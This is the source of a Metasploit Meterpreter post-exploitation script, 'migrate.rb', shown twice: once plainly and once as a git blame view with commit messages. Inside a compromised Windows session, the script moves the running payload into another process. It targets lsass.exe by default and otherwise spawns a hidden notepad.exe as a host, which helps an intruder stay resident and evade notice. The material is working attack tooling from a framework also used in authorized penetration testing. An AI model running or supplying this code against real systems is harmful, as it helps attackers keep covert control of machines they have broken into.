scripts/meterpreter/migrate.rb

# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#

spawn = false
target = nil

opts = Rex::Parser::Arguments.new(
	"-h" => [ false,"Help menu." ],
	"-f" => [ false, "Launch a process and migrate into the new process"]
)
opts.parse(args) { |opt, idx, val|
	case opt
	when "-f"
		spawn = true
	when "-h"
		print_line("")
		print_line("USAGE:   run migrate [process name]")
		print_line("EXAMPLE: run migrate explorer.exe")
		print_line(opts.usage)
		raise Rex::Script::Completed
	else
		target = val
	end
}


if client.platform =~ /win32|win64/
	server = client.sys.process.open

	print_status("Current server process: #{server.name} (#{server.pid})")

	target_pid = nil

	if ! spawn
		# Get the target process name
		target ||= "lsass.exe"
		print_status("Migrating to #{target}...")

		# Get the target process pid
		target_pid = client.sys.process[target]

		if not target_pid
			print_error("Could not access the target process")
			print_status("Spawning a notepad.exe host process...")
			note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
			target_pid = note.pid
		end
	else
		target ||= "notepad.exe"
		print_status("Spawning a #{target} host process...")
		newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
		target_pid = newproc.pid
		if not target_pid
			print_error("Could not create a process around #{target}")
			raise Rex::Script::Completed
		end
	end

	# Do the migration
	print_status("Migrating into process ID #{target_pid}")
	client.core.migrate(target_pid)
	server = client.sys.process.open
	print_status("New server process: #{server.name} (#{server.pid})")

else
	print_error("This version of Meterpreter is not supported with this Script!")
	raise Rex::Script::Completed
end
keywords 2009-10-26 15:14:28 +00:00			`# $Id$`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00			`#`
more cleanups 2010-05-03 17:13:09 +00:00			`# Simple example script that migrates to a specific process by name.`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00			`# This is meant as an illustration.`
			`#`

Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`spawn = false`
fix variable scope issue 2010-01-19 17:03:53 +00:00			`target = nil`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00
more hot -h action 2009-11-04 16:35:51 +00:00			`opts = Rex::Parser::Arguments.new(`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`"-h" => [ false,"Help menu." ],`
			`"-f" => [ false, "Launch a process and migrate into the new process"]`
more hot -h action 2009-11-04 16:35:51 +00:00			`)`
			`opts.parse(args) { \|opt, idx, val\|`
			`case opt`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`when "-f"`
			`spawn = true`
more hot -h action 2009-11-04 16:35:51 +00:00			`when "-h"`
			`print_line("")`
			`print_line("USAGE: run migrate [process name]")`
			`print_line("EXAMPLE: run migrate explorer.exe")`
			`print_line(opts.usage)`
			`raise Rex::Script::Completed`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`else`
			`target = val`
more hot -h action 2009-11-04 16:35:51 +00:00			`end`
			`}`


support for meterpreter scripts 2006-09-19 03:15:25 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`if client.platform =~ /win32\|win64/`
			`server = client.sys.process.open`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`print_status("Current server process: #{server.name} (#{server.pid})")`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`target_pid = nil`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`if ! spawn`
			`# Get the target process name`
			`target \|\|= "lsass.exe"`
			`print_status("Migrating to #{target}...")`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`# Get the target process pid`
			`target_pid = client.sys.process[target]`
more cleanups 2010-05-03 17:13:09 +00:00
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`if not target_pid`
			`print_error("Could not access the target process")`
			`print_status("Spawning a notepad.exe host process...")`
			`note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })`
			`target_pid = note.pid`
			`end`
			`else`
			`target \|\|= "notepad.exe"`
			`print_status("Spawning a #{target} host process...")`
			`newproc = client.sys.process.execute(target, nil, {'Hidden' => true })`
			`target_pid = newproc.pid`
			`if not target_pid`
			`print_error("Could not create a process around #{target}")`
			`raise Rex::Script::Completed`
			`end`
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`end`
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00
			`# Do the migration`
			`print_status("Migrating into process ID #{target_pid}")`
			`client.core.migrate(target_pid)`
			`server = client.sys.process.open`
			`print_status("New server process: #{server.name} (#{server.pid})")`

Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always 2009-12-15 05:10:33 +00:00			`else`
All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP 2010-09-09 16:09:27 +00:00			`print_error("This version of Meterpreter is not supported with this Script!")`
			`raise Rex::Script::Completed`
support for meterpreter scripts 2006-09-19 03:15:25 +00:00			`end`